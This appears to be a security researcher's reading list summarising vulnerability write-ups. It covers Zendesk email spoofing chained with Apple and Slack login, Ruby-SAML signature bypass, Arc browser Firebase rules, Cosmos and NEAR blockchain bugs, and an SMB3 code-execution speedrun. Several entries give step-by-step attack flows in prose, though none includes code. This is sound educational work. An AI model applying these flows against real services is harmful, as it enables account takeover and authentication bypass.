Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cosmos LSM Module Backdoor- 1517

AllInBits    Reference →Posted 1 Year Ago
  • The Cosmos blockchain is a popular AppChain SDK used by various blockchains like Osmosis. The main feature developer for the SDK is the Interchain Foundation. In the past 3 years, the Liquid Staking Module (LSM) was built by a third party called Iqlusion. This is where the drama is at.
  • Iqlusion developed all of the Cosmos SDK code for the LSM portion alongside an individual named Zaki. In July of 2022, Oak Security performed a security audit of the codebase. They found a fairly bad vulnerability in the codebase that was brushed off by the developers and noted as intended design. In particular, a staker could avoid slashing by tokenizing their delegations, which is a major compromise to the security of the protocol.
  • A year after this code was reviewed, Zaki was reached out to by the FBI (I'm serious) about the developers being linked to North Korean threat actors. For some reason, Zaki did not disclose this to anyone in the Cosmos community and continued with the project as normal. A few months after this, a proposal was made to add LSM to the Cosmos Hub. To me, this shows a major lapse in judgement from Zaki - prioritizing features and personal gain before security.
  • Eventually, LSM was added to Cosmos Hub. This is disturbing for two reasons. First, there is a fairly bad vulnerability in the repository that was never fixed. Most of the time, auditors are willing to relent after some discussions. Given that the vulnerability was still there, it's strange that this got the move on. Second, another issue, intentionally added by the NK developers, may have been present in the codebase without anybody knowing.
  • All of this recently came to light because of an article from CoinDesk. To me, it's scary how the code got to production without anybody flagging the security issue in the report. Additionally, how an individual didn't mention the NK developers working on this.
  • An absolutely crazy situation. When working with this amount of money and annonimity though, these things are bound to happen. Personally, I think the article repeats itself too much for dramatic effect and calls the vulnerability "critical" when the report itself from Oak Security labels it as a high. Regardless, the write up has a lot of good links which I appreciate.

Zendesk Backdoor for Half of All Fortune 500 Companies - 1516

hackermondev    Reference →Posted 1 Year Ago
  • Zendesk is a customer service tool. To setup, you link it to your company's customer support email, such as support@company.com. Now, Zendesk will manage all incoming emails and create tickets for you.
  • When an email is sent to the company's Zendesk support email, a new ticket is created. To keep track of the thread, an automatic reply-to address is created with support+id{id}@company.com where {id} is the ticket number. Zendesk has ticket collaboration that lets you CC someone on email replies. The author found a really bad bug in this.
  • Zendesk did not protect against email spoofing on the collaboration feature! This meant that an attacker could impersonate the original sender to tag their own email to the ticket. Now, all of the ticket information would be readable by the attacker. Ticket IDs are also sequential, making it easy to guess.
  • When reported, both HackerOne and Zendesk claimed this fell "out of scope" because of a clause saying that "SPF,DKIM and DMARC issues are out of scope". Instead of just popping a single company with this over and over again, they decided to escalate this. In a previous blog post from 2017, the author used Zendesk to login to private Slack workspaces by bypassing the verification process for emails using the support email. They wanted to reproduce this.
  • Slack had added a protection to prevent these types of attacks since then: a random blob in the no-reply. Since the exploit required knowing this, it wouldn't be possible. Since this protection was added to Slack, it was NOT added to their other OAuth options of Google and Apple!
  • The flow for exploit was as follows:
    1. Create an Apple account with support@company.com as the email to request a verification code.
    2. Apple sends the verification code to Zendesk, which automatically creates the ticket.
    3. Use the email spoofing bug to add yourself to the ticket created for the Apple email verification.
    4. Login to the support Portal for the CCed account. This has the code in it now.
    5. Enter the verification code in Apple to confirm the address.
    6. Use Slacks "Login with Apple" feature from your new company email.
  • The author of this reported the vulnerability to a lot of Fortune 500 companies. They got 50K in bug bounties from these companies but Zendesk wasn't happy. The kid (he's 15) didn't show the Slack privilege escalation technique to them, which escalated the privileges dramatically. Finally, two month after submission, Zendesk fixed the issue but claimed that email flagging would have caught this in their internal systems. Because he broke the HackerOne disclosure guidelines, he got no bounty from them.
  • Personally, I don't think this was handled properly on either side. Attackers don't care about scope - they care about impact. So, Zendesk should have dealt with this imo. Daniel also didn't show HackerOne the Slack privilege escalation but Zendesk may not have cared even if he did. They only cared once the customers complained. Feels like a damned if you do and damned if you don't situation.
  • Regardless, a simple vulnerability and an amazingly creative privilege escalation alongside drama on the bug reporting made this an awesome read. They sum up the experience best at the end "that's the reality of bug hunting—sometimes you win, sometimes you don't."

NES DPCM Workaround Vulnerability Leads to ACE in SMB3- 1515

100th Coin    Reference →Posted 1 Year Ago
  • The Nintendo Entertainment System (NES) was built in an era of CRT TVs, where rendering it entirely different than LEDs. Most graphical changes happen during a blanking period; so, there is an interrupt to ensure this is the case. The VBlank interrupt is a Non-Maskable-Interrupt (NMI).
  • The game console also has Interrupt Requests or ICQs for short. Depending on the game mode that the gameplay is in, the IRQ will behave differently. Additionally, the NES had logical blocks of code and assets in banks, where only one bank can be loaded at a time.
  • The NMIs swap out the PRG bank during graphics changes. Eventually, by the end of the NMI, the proper banks are swapped back in. What if we could trick code to run with the improper banks loaded? This is how the vulnerability that was found works!
  • DPCM audio samples have the ability to corrupt controller inputs. This is because a register is shifted one too many times. Since the DMA read is asynchronous and this is a hardware issue, we must find a way to workaround this. To fix this issue, the most common fix was to simply poll the controller over and over again until the same buttons were seen twice in a row.
  • So, what's the bug? By changing buttons at a rate of 8K inputs per frame, we can trick the polling code for controller inputs to be stuck forever! This paired with an interrupt leads to a situation where code from a bank never intended to be executed in this context will be ran!
  • By some miracle, the code runs fine. Eventually, a RTS instruction will jump the code to 0x0000 on the stack. The NMI continues to happen every frame - it records button press inputs to $17,$18,$F5,$F6 and $F8. Through careful planning, the controller inputs can be used to write somewhat arbitrary asm to execute.
  • $17 is the total held buttons on controller 1 and $18 is the new buttons pressed using a bit for each button. $F5,$F6 and $F8 have similar limitations to $17/$18. This creates a limitation of which bytes can be used for the second byte. Additionally, left and right as well as up and down cannot be held at the same time, further limiting the instructions.
  • With these limitations in mind, our goal is to warp to the end credits. There are 6 criteria that need to be met with 3 of them already there once we start relating to banks. The first is the stack be larger than 0x30, second is NMI mode at address $100 must be 0x20 and we need to jump to $B85A.
  • Previous versions of the TAS had to work around the limitations above. However, the author found a special case - bytes 0x0-0x2 uses these for scratch addresses at the end of an NMI. They happen to be for controller inputs INCLUDING the conflicting inputs. By using this property, we have more control over these two bytes, which happens to be enough :)
  • The TAS is 3 frames long of game play. Here is what happens:
    1. Write JSR $9000 at the scratch address using two controllers. Using the only inputs PUSH a value of 0xFA to register SP.
    2. The next NMI occurs and writes our controller inputs to the stack. This time, our inputs result in JSR $0000 being executed.
    3. JSR $9000 is executes from the previous write after our jump occurs. Since the SP is sane this works.
  • The video for this explains a slightly simplified version, which is what the example is based on. However, the concepts are the same. A funny change they made was using a different version of the game because of the addresses are slightly different.
  • Overall, the article and video are amazing resources! Beating SMB3 is less than a second is hilarious and I very much enjoyed learning about this. From the vulnerability itself to a making the exploit work, it's truly magic :)

gaining access to anyones browser without them even visiting a website- 1514

Eva    Reference →Posted 1 Year Ago
  • Arc is a new browser focused on security and privacy. They recently added cloud functionality for storing CSS and JavaScript browser customization's called boosts.
  • Firebase is a database-as-a-service. Instead of writing a full backend, you write security rules for what usres can and can't do. Although this tool is awesome, many folks have messed up the rules in the past.
  • Reading the Firebase security rules, we can't modify other users data directly because it's queried by CreatorId. However, we can specify our boost to have another users ID! Most of the time, adding information to a user blind isn't helpful. In the case of JavaScript being ran in the browser, it's real bad though.
  • To find user ids, an attacker can look for referrals, published boosts and whiteboards. To make matters worse, privileged pages in Chromium, such as chrome://settings were affected by this. Since these pages have special permissions, it's likely that RCE was possible.
  • Arc decided to migrate off of Firebase in light of this issue. I personally haven't spent too much time looking at Firebase but it seems popular yet difficult to use securely. Good find!

Vest in Peace: Freezing Cosmos account funds through invalid vesting periods- 1513

ForDefi     Reference →Posted 1 Year Ago
  • In the Cosmos SDK, a vesting account is a type of account whose coins are locked for some vesting schedule. A periodic vesting account will give out funds at defined intervals. A clawback account has an additional locking period, after which the vesting funds are received.
  • Both periodic and clawback accounts do not validate their input upon account creation. The code fails to validate that the amount in each vesting period is positive. There are several variants of the input validation being missing here in forks of the Cosmos SDK as well.
  • So, what's the impact? Initialize a vesting account but make the funds impossible to withdraw. By adding negative token amounts such as -1stake, the validation of the bank module to ensure a user isn't overdrawing amounts will panic.
  • To make this work, the authors claim that you would want to see a new account being created, frontrun it and poison it. This account can now receive funds back it cannot take them out. Frontrunning is unlikely to occur in Cosmos but is technically possible.
  • To fix the bug, simply validate that all amounts are positive. Overall, a good read and learning into vesting accounts in the Cosmos SDK.

Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409)- 1512

Project Discovery    Reference →Posted 1 Year Ago
  • SAML is a common protocol for exchanging authentication and authorization data between IdPs and Service Providers (SPs). SAML is written in the markup language XML.
  • In SAML, the core element is the Assertion. This holds information about user details in most cases. To ensure it hasn't been tampered, the assertion is hashed then verified with a digital signature.
  • The Signature value is passed inside the SignatureValue element. The hashed data is in the SignedInfo block. This contains a DigestValue and a Reference URI pointing to the assertion.
  • To verify the signature a service provider receives the SAML response then performs two checks: digest verification and signature verification. The digest verification calculates that the Assertion data hashed matches the DigestValue in the SignedInfo block to prevent tampering. Next, it validates the digital signature over the top of the hash.
  • The Ruby-SAML library has several validations before the signature validation. In XPATH, used for finding elements in an XML document, / will select the root of the document and // will select any node from the document that it can find.
  • Finally, on to the vulnerability! When getting the DigestValue via XPATH, the query was //ds:DigestValue. This will find the first instance of the DigestValue in the document! This allows an attacker to smuggle in the value into the document.
  • Finally, on to the vulnerability! When getting the DigestValue via XPATH, the query was //ds:DigestValue. This will find the first instance of the DigestValue in the document! This allows an attacker to smuggle in the value into the document.
  • This is bad! In the SAML validation, we can bypass the verification with the following flow:
    1. Insert a DigestValue into an unsigned element with a modified Assertion block.
    2. XPATH will extract the smuggled value instead of the one from the SignedInfo block. This bypasses the first step above of checking that the DigestValue is correct.
    3. Signature verification occurs on the DigestValue from the SignedInfo block. From previous verification, it was assumed that the actual hash and the one in this block must match.
  • The author includes an XML document that is super interesting to look at from a security perspective. An awesome find in a technology that I'm not super familiar with but enjoyable none-the-less.

Eliminating Memory Safety Vulnerabilities at the Source - 1511

Google Security Blog    Reference →Posted 1 Year Ago
  • The blog post revolves around Google Androids security program but the results apply to other places. Android has produced more and more code in memory-safe languages like Rust instead of unsafe ones like C. The analysis of this post is around the number of memory corruption vulnerabilities over the years.
  • Over the course of 6 years, most new development has occurred in memory-safe languages. Even though the amount of code is slowly growing in the memory unsafe languages and the original unsafe code still exists, the amount of memory corruption bugs has dropped significantly. Why though? Doesn't all memory-unsafe code need to be rewritten?
  • According to this article, the answer is no. Vulnerabilities are much more likely to be discovered in new code, as found by a Usenix paper from years ago. According to the details from Android and Chromium bugs, 5-year-old code is 3.4 to 7.4 times less likely to have a bug than new code. So, if the new Android code is 6 years old, is much less likely to have bugs in it. As a result, we don't need to rewrite all memory unsafe code, saving lots of money and bugs along the way.
  • In terms of designing software, killing bug classes from the beginning is the way to go. If you use a memory safe language, you kill a bug class entirely, which is amazing. This is opposed to the original and expensive style of reactive patching, exploit mitigations like ASLR, NX, etc. and proactive vulnerability discovery. Overall, great article on where to hunt for bugs at!

Web3 Ping of Death: Finding and Fixing a Chain-Halting Vulnerability in NEAR- 1510

Faith - Zellic    Reference →Posted 1 Year Ago
  • Rust is perfectly safe and we never have to worry again, right? In Rust, error handling is tedious and most be specifically handled. Because of this, many denial of service (DoS) vectors revolve around handling errors in Rust.
  • In P2P networking, you are communicating with other computers which in turn communicate with other computers. So, this is a necessity of communicating in a blockchain network and must be externally exposed in some way.
  • The author of this post found two locations where errors were not being handled correctly. First, when verifying a public key the from_slice() function requires that it must be 32 bytes in length. When processing this in the handshake code of P2P, expect(), a nice wrapper for unwrap() is called. If the public key isn't 32 bytes, then a panic is triggered.
  • The second vulnerability has to do with signature parsing. The ECDSA code from_i32() converts the recovery ID value from a single byte to an i32. When doing this, the value is required to be between 0-3 but it can in reality be 0-255. Later on, unwrap() is called, causing a panic upon the error path being taken.
  • Both of these vulnerabilities cause a panic that crashes the node. To me, it's weird that a small parsing issues crashes the node and there is no recovery that happens on the node, similarly to how Golang can. Between the two vulnerabilities, they got 150K in bug bounties, which is awesome! It's fascinating how such little functions in error handling can have catastrophic consequences on the uptime of the software.

CharismaBTC hack incident analysis- 1509

ExVul    Reference →Posted 1 Year Ago
  • The smart contract runtime environment of this exploit was Stacks. This is a Bitcoin layer 2 solution that uses the Clarity smart contract language. Honestly, I couldn't follow this article. I also don't know how Stacks/Clarity works either. So, I had to ask a friend about how this exploit worked. So, take this with a grain of salt.
  • In most smart contract runtimes, you send funds alongside your call. In Stacks, the end user wallet specifies post conditions that determine what can be done, making this fail open instead of fail closed. In theory, if there is no post condition that disallows a contract taking all of your tokens, then it's legal to do.
  • In Solidity, there are two senders: tx.origin and msg.sender. One is used for the original executor of the transaction and the second is the most recent caller. This same concept exists in Clarity as well.
  • When making an external call to another contract, the AsContract command can override the tx.origin of the original caller. This is super important because this is what the post conditions are based around!
  • The post conditions can only be set by the original executor and NOT the smart contract. When the AsContract command is used, if the call is made to an untrusted contract then there are no post conditions restricting where the money can go for this! This lack of access control on the smart contract call is the reason for the bug. By becoming the contract, we can now drain all of the funds from it. Yikes!
  • The existence of AsContract is weird to me. I get there are situations where you want to act as the caller but it's such a security liability here. Again, not a great write up but an interesting vulnerability class none-the-less.

CSP Bypass Website- 1508

renniepak    Reference →Posted 1 Year Ago
  • Content Security Policies (CSP) are an XSS defense mechanism. Of course, if you found XSS, you want to circumvent the CSP. This is a website with XSS gadgets known on various popular programs.